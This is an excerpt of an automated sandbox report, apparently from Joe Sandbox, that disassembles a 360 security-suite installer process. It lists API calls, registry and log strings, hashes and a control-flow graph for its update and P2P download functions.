                                                                                                                                                                      • CreateFileW.KERNEL32 ref: 0016E0AA
                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,(5#,00000000,00000004,00000000,00000004,00000000,00000000), ref: 0016E0DA
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0016E0E3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseControlCreateCurrentDeviceFileHandleProcess
                                                                                                                                                                      • String ID: (5#$\\.\360SelfProtection
                                                                                                                                                                      • API String ID: 3778458602-3399028602
                                                                                                                                                                      • Opcode ID: 4fafd6501c16d9c186cd1b05dfcc801f9f7c78190ae4eabdd51b57429a54c769
                                                                                                                                                                      • Instruction ID: 02c7860ec26e45b0ca72c04bca6cb36d25e7da87e00d674f217389d18593a94d
                                                                                                                                                                      • Opcode Fuzzy Hash: 4fafd6501c16d9c186cd1b05dfcc801f9f7c78190ae4eabdd51b57429a54c769
                                                                                                                                                                      • Instruction Fuzzy Hash: 9BF0A4327443107BE6109B64FC0AFAE77A4AB84F11F454658FB94A71D0D7B45608C797
                                                                                                                                                                      Function 001D0145 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001D0152
                                                                                                                                                                      • FindResourceW.KERNEL32(00000000,?,?,DLL), ref: 001D0163
                                                                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000,00000000), ref: 001D0174
                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 001D0180
                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 001D018B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Resource$FindLoadLockSizeof_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3046278646-0
                                                                                                                                                                      • Opcode ID: 8cc8433009b9c8226904e9b82dfc7c5a704f4943d6d6062689d9d59c3dc9dee1
                                                                                                                                                                      • Instruction ID: ce7b4e120c3ffc64b892a5b8b2467edd15332dfecdcc986c03344d74fe00b8dd
                                                                                                                                                                      • Opcode Fuzzy Hash: 8cc8433009b9c8226904e9b82dfc7c5a704f4943d6d6062689d9d59c3dc9dee1
                                                                                                                                                                      • Instruction Fuzzy Hash: A0F06D72500305BFCF115F65FC08AAA7F68EF547A1F018025FD18D6220DB31C860DBA0
                                                                                                                                                                      Function 001CDA24 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(0024C628,0024C628,0024CDBC,00000000,0024C68C,02E24560), ref: 001CDA53
                                                                                                                                                                        • Part of subcall function 0017D354: _wcsnlen.LIBCMT ref: 0017D36B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: PrivateProfileString_wcsnlen
                                                                                                                                                                      • String ID: 360Installer
                                                                                                                                                                      • API String ID: 4066129061-2026047672
                                                                                                                                                                      • Opcode ID: 05b6464acd169ccd31c54fc829d13c9233a963d02bd259246a4d3f20341c4653
                                                                                                                                                                      • Instruction ID: 1134f33b548b4991ded852ee12e6066d1775cae6e19fee34d398b06b0db75d46
                                                                                                                                                                      • Opcode Fuzzy Hash: 05b6464acd169ccd31c54fc829d13c9233a963d02bd259246a4d3f20341c4653
                                                                                                                                                                      • Instruction Fuzzy Hash: B2E03073104210ABD6109BA4DC44D9BB7F9EF98760F144A59F55993261C7316C20CBA1
                                                                                                                                                                      Function 5F51FEA4 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: listen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3257165821-0
                                                                                                                                                                      • Opcode ID: 5af958e5c2cc35e3eb7916246b9b5bf46361eef3c7ec6eb2e9b72ea0fc482ec8
                                                                                                                                                                      • Instruction ID: 7681465be3e253cd5fefa8516ef8f45db6f3c5a44134b47a0434fdf8e47dc99d
                                                                                                                                                                      • Opcode Fuzzy Hash: 5af958e5c2cc35e3eb7916246b9b5bf46361eef3c7ec6eb2e9b72ea0fc482ec8
                                                                                                                                                                      • Instruction Fuzzy Hash: 61D09272254100DBD7019B24C648E2177B5BB5972AF2086ACB14D8A1A2C7329866DB00
                                                                                                                                                                      Function 5F516F71 Relevance: 56.3, APIs: 16, Strings: 16, Instructions: 275registryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 5F516DCB: RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\LiveUpdate360,00000000,000F003F,5F5BC288,00000000,5F57AC78,74DF30D0,?,5F5BC3F0,5F5BC288), ref: 5F516DF2
                                                                                                                                                                      • RegQueryValueExW.KERNEL32(00000000,LogLevel,00000000,?,?,?,?,5F57AC78), ref: 5F516FE4
                                                                                                                                                                      • RegQueryValueExW.KERNEL32(?,DnsProxy,00000000,?,?,?,?,5F57AC78), ref: 5F517010
                                                                                                                                                                      • RegQueryValueExW.KERNEL32(?,TFWRate,00000000,?,?,?,?,5F57AC78), ref: 5F51703C
                                                                                                                                                                      • RegQueryValueExW.KERNEL32(?,Intranet,00000000,?,?,?,?,5F57AC78), ref: 5F517068
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,ProxyUpdateDate,00000000,?,?,?,?,5F57AC78), ref: 5F51709C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: QueryValue$Open
                                                                                                                                                                      • String ID: ,%s,$,360sdupd,360tray,360leakfixer,360safe,softmanager,360netcfg,seup,360entclient,softmgr,sdis,$360sdUpd,360tray,360leakfixer,360safe,SoftManager,360netcfg,seup,360EntClient,SoftMgr,Sdis$DnsProxy$Intranet$LogLevel$MaxDnSpeed$MaxUpSpeed$MaxUpUpdate$Nat$NatUpdate$NatWLan$PeerNumPerS$ProxyUpdateDate$TFWRate$UseEntModuleList
                                                                                                                                                                      • API String ID: 1606891134-779865806
                                                                                                                                                                      • Opcode ID: f9b178bb0aeb89b0f17dde6fc213a1bfc02205bf9b68a6b31387ba72f2b03a55
                                                                                                                                                                      • Instruction ID: 592e3a6cf20613ed57cfc4567814a239acdba31316c6187fb1eb9a63aa62e4e2
                                                                                                                                                                      • Opcode Fuzzy Hash: f9b178bb0aeb89b0f17dde6fc213a1bfc02205bf9b68a6b31387ba72f2b03a55
                                                                                                                                                                      • Instruction Fuzzy Hash: 44B172B2D0161CABEB11DFA5CD80DEEBBBCFB09654B20422FE519E7202E73166458F50
                                                                                                                                                                      Function 001CD0F5 Relevance: 42.2, APIs: 6, Strings: 18, Instructions: 204COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001CD0FC
                                                                                                                                                                      • SHCreateDirectoryExW.SHELL32(00000000,?,00000000,\360P2SP.dll,00000000,DLL,00000014,0017BCDE), ref: 001CD1E0
                                                                                                                                                                      • MoveFileExW.KERNEL32(?,00000000,00000004,?), ref: 001CD1FD
                                                                                                                                                                      • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 001CD218
                                                                                                                                                                      • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 001CD23E
                                                                                                                                                                      • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 001CD252
                                                                                                                                                                        • Part of subcall function 0017AFB8: __EH_prolog3.LIBCMT ref: 0017AFBF
                                                                                                                                                                        • Part of subcall function 001CCF0E: GetProcAddress.KERNEL32(?,?), ref: 001CCF16
                                                                                                                                                                        • Part of subcall function 001CCF23: GetProcAddress.KERNEL32(?,?), ref: 001CCF2B
                                                                                                                                                                        • Part of subcall function 001CCF38: GetProcAddress.KERNEL32(?,?), ref: 001CCF40
                                                                                                                                                                        • Part of subcall function 001CCF4D: GetProcAddress.KERNEL32(?,?), ref: 001CCF55
                                                                                                                                                                        • Part of subcall function 001CCF62: GetProcAddress.KERNEL32(?,?), ref: 001CCF6A
                                                                                                                                                                        • Part of subcall function 001CCF77: GetProcAddress.KERNEL32(?,?), ref: 001CCF7F
                                                                                                                                                                        • Part of subcall function 001CCF8C: GetProcAddress.KERNEL32(?,?), ref: 001CCF94
                                                                                                                                                                        • Part of subcall function 001CCFA1: GetProcAddress.KERNEL32(?,?), ref: 001CCFA9
                                                                                                                                                                        • Part of subcall function 001CCFB6: GetProcAddress.KERNEL32(?,?), ref: 001CCFBE
                                                                                                                                                                        • Part of subcall function 001CCFCB: GetProcAddress.KERNEL32(?,?), ref: 001CCFD3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$FileMove$H_prolog3$CreateDirectory
                                                                                                                                                                      • String ID: CreateP2SPTask$DLL$GetFinishMessage$Init$Login$QueryTask$RemoveTask$SetConfigInfo$SetP2spOption$StartTask$StopSeed$StopTask$Uninit$UpdateRegInfo$\360P2SP.dll$\liveupdatelog$\liveupdatelog\P2SP_360installer.log$liveupdatelog
                                                                                                                                                                      • API String ID: 2807886459-1040481394
                                                                                                                                                                      • Opcode ID: 17734babcb0a0d735fa89f28dc3ee14061fc50a83812fffa2f0fcfe64f1550fb
                                                                                                                                                                      • Instruction ID: 502768be226ece3bac5197c31a2fd5d28151ddbbab1bd52655c51187fc539e32
                                                                                                                                                                      • Opcode Fuzzy Hash: 17734babcb0a0d735fa89f28dc3ee14061fc50a83812fffa2f0fcfe64f1550fb
                                                                                                                                                                      • Instruction Fuzzy Hash: 4061AE72640714BBDB20EBA0DC46FAEB3B9AF35B10F40462CF556A25E1DB60ED148B60
                                                                                                                                                                      Function 5F4FC7D8 Relevance: 35.6, APIs: 5, Strings: 15, Instructions: 622COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 679 5f4fc7d8-5f4fc9d6 __EH_prolog3 GetTickCount _memset call 5f5140cf call 5f4d9134 * 2 call 5f4dd55b call 5f4ed06f 690 5f4fca18-5f4fca4a call 5f4ec0ec call 5f4ec0f3 679->690 691 5f4fc9d8-5f4fca13 call 5f4f7821 call 5f4ea53b call 5f51405e 679->691 700 5f4fca4c-5f4fca50 690->700 701 5f4fca60-5f4fca6c 690->701 707 5f4fcf5f-5f4fcf6c call 5f4fc754 691->707 700->701 703 5f4fca52-5f4fca54 700->703 704 5f4fca6e-5f4fca88 call 5f4f79aa call 5f52b3c5 701->704 705 5f4fca92-5f4fca94 701->705 703->701 710 5f4fca56-5f4fca5b call 5f525fbf 703->710 712 5f4fcaa9-5f4fcb16 call 5f513f7c * 2 call 5f4f79aa call 5f513f7c call 5f4f79aa call 5f52b3c5 704->712 725 5f4fca8a-5f4fca90 704->725 708 5f4fca9c-5f4fcaa1 705->708 709 5f4fca96 705->709 721 5f4fd092-5f4fd097 call 5f528efc 707->721 708->712 713 5f4fcaa3 708->713 709->708 710->701 736 5f4fcb18 712->736 737 5f4fcb22-5f4fcb3c call 5f4f79aa call 5f52b3c5 712->737 713->712 725->712 736->737 742 5f4fcb3e-5f4fcb42 737->742 743 5f4fcb63-5f4fcb76 call 5f528425 737->743 742->743 744 5f4fcb44-5f4fcb4a 742->744 749 5f4fcb78-5f4fcb7f call 5f4e70ce 743->749 750 5f4fcb81 743->750 744->743 746 5f4fcb4c-5f4fcb5b 744->746 746->743 748 5f4fcb5d 746->748 748->743 751 5f4fcb83-5f4fcba1 call 5f528425 749->751 750->751 756 5f4fcbac 751->756 757 5f4fcba3-5f4fcbaa call 5f4fb780 751->757 759 5f4fcbae-5f4fcbcb 756->759 757->759 761 5f4fcbcd-5f4fcbf3 call 5f4f79aa call 5f4e2b99 call 5f4e0ed7 759->761 762 5f4fcbf8-5f4fcbfc 759->762 761->762 763 5f4fcbfe-5f4fcc0e 762->763 764 5f4fcc6a-5f4fcc81 call 5f528425 762->764 766 5f4fcc15 763->766 767 5f4fcc10-5f4fcc13 763->767 774 5f4fcc8f 764->774 775 5f4fcc83-5f4fcc8d call 5f4fb65d 764->775 770 5f4fcc18-5f4fcc45 call 5f4e809d 766->770 767->770 783 5f4fcc4d-5f4fcc67 call 5f513f0c 770->783 784 5f4fcc47 770->784 777 5f4fcc91-5f4fccb0 call 5f4f6f1e 774->777 775->777 787 5f4fccb5-5f4fccca call 5f4dc462 777->787 788 5f4fccb2-5f4fccb4 777->788 783->764 784->783 792 5f4fcccc-5f4fccd2 787->792 793 5f4fcd17-5f4fcd1a 787->793 788->787 796 5f4fccd4-5f4fccdf DeleteFileW 792->796 797 5f4fcd00-5f4fcd06 792->797 794 5f4fcd1c-5f4fcd1f 793->794 795 5f4fcd21-5f4fcd2f call 5f4f6edf 793->795 794->795 799 5f4fcd31-5f4fcd3b call 5f4ed64f 794->799 808 5f4fcd3c-5f4fcd3e 795->808 801 5f4fccfb-5f4fccfe 796->801 802 5f4fcce1-5f4fcced call 5f4dc462 796->802 797->793 798 5f4fcd08-5f4fcd14 call 5f4dc4ea 797->798 798->793 799->808 801->793 802->801 813 5f4fccef-5f4fccf6 802->813 811 5f4fcd6c-5f4fcd89 call 5f52ab44 808->811 812 5f4fcd40-5f4fcd62 call 5f4f7821 call 5f4ea53b 808->812 821 5f4fcd8b-5f4fcd93 call 5f4dd5cb 811->821 822 5f4fcd9a 811->822 812->811 816 5f4fcf29-5f4fcf5c call 5f4f7821 call 5f4ea53b call 5f51405e 813->816 816->707 829 5f4fcd98 821->829 826 5f4fcd9c-5f4fcda5 822->826 830 5f4fcda7-5f4fcdc9 call 5f4f7821 call 5f4ea53b 826->830 831 5f4fcdd3-5f4fcdd7 826->831 829->826 830->831 833 5f4fcddd-5f4fcde1 831->833 834 5f4fcf71-5f4fcf7b 831->834 837 5f4fcf07-5f4fcf12 DeleteFileW 833->837 838 5f4fcde7-5f4fcdf4 call 5f4f87c8 833->838 839 5f4fcf7d-5f4fcf80 834->839 840 5f4fcf82 834->840 837->834 843 5f4fcf14-5f4fcf20 call 5f4dc462 837->843 850 5f4fcdfa-5f4fce00 838->850 851 5f4fce81-5f4fce84 838->851 844 5f4fcf85-5f4fcf8e call 5f4dc462 839->844 840->844 843->834 857 5f4fcf22-5f4fcf24 843->857 858 5f4fcfb0-5f4fcfbd call 5f4f87c8 844->858 859 5f4fcf90-5f4fcfae call 5f4dd392 call 5f4dcefd call 5f513f0c 844->859 850->851 856 5f4fce02-5f4fce08 850->856 854 5f4fce86-5f4fce90 call 5f4f84ee 851->854 855 5f4fceb3-5f4fceba 851->855 854->855 874 5f4fce92-5f4fceae call 5f4dcefd call 5f4f7821 854->874 855->837 864 5f4fcebc-5f4fcf02 call 5f4f70a8 call 5f4f7821 call 5f4ea53b call 5f51405e 855->864 856->851 862 5f4fce0a-5f4fce18 856->862 857->816 872 5f4fcfbf-5f4fcfc5 858->872 873 5f4fcfca-5f4fcfcc 858->873 902 5f4fcfe2-5f4fcfe5 859->902 867 5f4fce2d-5f4fce53 call 5f4f757f 862->867 868 5f4fce1a-5f4fce2b call 5f4f6f33 862->868 864->721 891 5f4fce55-5f4fce57 867->891 892 5f4fce73-5f4fce7c 867->892 868->867 872->873 880 5f4fcfc7-5f4fcfc9 872->880 881 5f4fcfce-5f4fcfd2 873->881 882 5f4fcfe7-5f4fcfe9 call 5f4f84ee 873->882 909 5f4fd090 874->909 880->873 881->882 888 5f4fcfd4-5f4fcfdd call 5f51405e 881->888 898 5f4fcfee-5f4fcff4 882->898 888->902 891->892 893 5f4fce59-5f4fce5e 891->893 892->851 893->892 901 5f4fce60-5f4fce6e call 5f4dc988 893->901 899 5f4fcffe-5f4fd013 898->899 900 5f4fcff6-5f4fcffc 898->900 905 5f4fd022-5f4fd034 899->905 906 5f4fd015 899->906 900->899 900->905 901->892 902->898 913 5f4fd036-5f4fd060 call 5f4f79aa call 5f4fab8f 905->913 914 5f4fd065-5f4fd089 905->914 910 5f4fd01b-5f4fd01d call 5f4f9989 906->910 911 5f4fd017-5f4fd019 906->911 909->721 910->905 911->905 911->910 913->914 914->909
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 5F4FC7DF
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F4FC85B
                                                                                                                                                                      • _memset.LIBCMT ref: 5F4FC964
                                                                                                                                                                        • Part of subcall function 5F5140CF: _memset.LIBCMT ref: 5F514102
                                                                                                                                                                        • Part of subcall function 5F5140CF: wvnsprintfW.SHLWAPI(?,000003FF,?,?), ref: 5F51411D
                                                                                                                                                                        • Part of subcall function 5F4D9134: _wcslen.LIBCMT ref: 5F4D913B
                                                                                                                                                                        • Part of subcall function 5F4DD55B: _wcslen.LIBCMT ref: 5F4DD562
                                                                                                                                                                        • Part of subcall function 5F4ED06F: __EH_prolog3.LIBCMT ref: 5F4ED08E
                                                                                                                                                                        • Part of subcall function 5F4ED06F: _wcslen.LIBCMT ref: 5F4ED0C6
                                                                                                                                                                        • Part of subcall function 5F4ED06F: __wcsnicmp.LIBCMT ref: 5F4ED0D1
                                                                                                                                                                        • Part of subcall function 5F4ED06F: _wcslen.LIBCMT ref: 5F4ED0DE
                                                                                                                                                                        • Part of subcall function 5F4ED06F: _wcslen.LIBCMT ref: 5F4ED10E
                                                                                                                                                                        • Part of subcall function 5F51405E: _memset.LIBCMT ref: 5F514091
                                                                                                                                                                        • Part of subcall function 5F51405E: wvnsprintfW.SHLWAPI(?,000003FF,5F5BC288,5F4FE1F9), ref: 5F5140AC
                                                                                                                                                                      Strings
                                                                                                                                                                      • [%d.] ErrorCode = %d(%s) PDownURL = %s, xrefs: 5F4FCA05
                                                                                                                                                                      • [%d.] DUQuota = %d Liveupdate360:%d, xrefs: 5F4FCC5C
                                                                                                                                                                      • [%d.] Delete mem File, xrefs: 5F4FCFA3
                                                                                                                                                                      • [%d.] discard resume mem, xrefs: 5F4FCFD7
                                                                                                                                                                      • [%d.] FileName=%s ErrorCode= %d(%s), xrefs: 5F4FCF51
                                                                                                                                                                      • 360tray, xrefs: 5F4FCB2E
                                                                                                                                                                      • [%d.] ErrorCode = %d(%s), xrefs: 5F4FCD62
                                                                                                                                                                      • ,360sdupd,360tray,360leakfixer,360safe,softmanager,360netcfg,seup,360entclient,softmgr,sdis,, xrefs: 5F4FCA7A, 5F4FCAC3
                                                                                                                                                                      • [%d.] AppName=%s IsSkipEnt:%d, xrefs: 5F4FCAEE
                                                                                                                                                                      • [%d.] ErrorCode = %d(%s), xrefs: 5F4FCDC9
                                                                                                                                                                      • [%d.] ErrorCode = %d(%s), , xrefs: 5F4FCEF2
                                                                                                                                                                      • [%d.] URL = %s File=%s, xrefs: 5F4FC97D
                                                                                                                                                                      • [%d.] EntModuleList=%s, xrefs: 5F4FCACB
                                                                                                                                                                      • [%d.]dl DownType:%d P2pDelay:%d.SkipEnt:%d, xrefs: 5F4FCAB8
                                                                                                                                                                      • .P2P, xrefs: 5F4FC9B6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcslen$_memset$H_prolog3wvnsprintf$CountTick__wcsnicmp
                                                                                                                                                                      • String ID: ,360sdupd,360tray,360leakfixer,360safe,softmanager,360netcfg,seup,360entclient,softmgr,sdis,$.P2P$360tray$[%d.] AppName=%s IsSkipEnt:%d$[%d.] DUQuota = %d Liveupdate360:%d$[%d.] Delete mem File$[%d.] EntModuleList=%s$[%d.] ErrorCode = %d(%s)$[%d.] ErrorCode = %d(%s)$[%d.] ErrorCode = %d(%s) PDownURL = %s$[%d.] ErrorCode = %d(%s), $[%d.] FileName=%s ErrorCode= %d(%s)$[%d.] URL = %s File=%s$[%d.] discard resume mem$[%d.]dl DownType:%d P2pDelay:%d.SkipEnt:%d
                                                                                                                                                                      • API String ID: 3392004093-4225084922
                                                                                                                                                                      • Opcode ID: ded15e357e081382699b01ead2ea524c44df1abbbb4fbd63e0032255b09a22aa
                                                                                                                                                                      • Instruction ID: 4e145669af95d8a2b75738c679832cfb7c11928ec5bfb110e5fed09a363d21e6
                                                                                                                                                                      • Opcode Fuzzy Hash: ded15e357e081382699b01ead2ea524c44df1abbbb4fbd63e0032255b09a22aa
                                                                                                                                                                      • Instruction Fuzzy Hash: 61427AB0901B00DFDB259FB5C840A9AFBF5EF94311F14891FE6AB863A1D771A640CB91
                                                                                                                                                                      Function 001B6F7F Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 174windowCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateSolidBrush.GDI32(00FFFFFF), ref: 001B6F99
                                                                                                                                                                        • Part of subcall function 001B65A6: __EH_prolog3.LIBCMT ref: 001B65AD
                                                                                                                                                                        • Part of subcall function 001B65A6: GetDlgItem.USER32(?,00000403), ref: 001B65D5
                                                                                                                                                                        • Part of subcall function 001B65A6: GetDlgItem.USER32(?,000003EF), ref: 001B665A
                                                                                                                                                                        • Part of subcall function 001B65A6: GetDlgItem.USER32(?,000003F1), ref: 001B66B4
                                                                                                                                                                        • Part of subcall function 001B65A6: GetDlgItem.USER32(?,00000411), ref: 001B66E7
                                                                                                                                                                      • MoveWindow.USER32(?,000000D7,000000A7,000000AF,00000050,00000001), ref: 001B6FCB
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 001B6FE1
                                                                                                                                                                      • MoveWindow.USER32(?,00000212,0000013E,00000032,00000014,00000001), ref: 001B6FFD
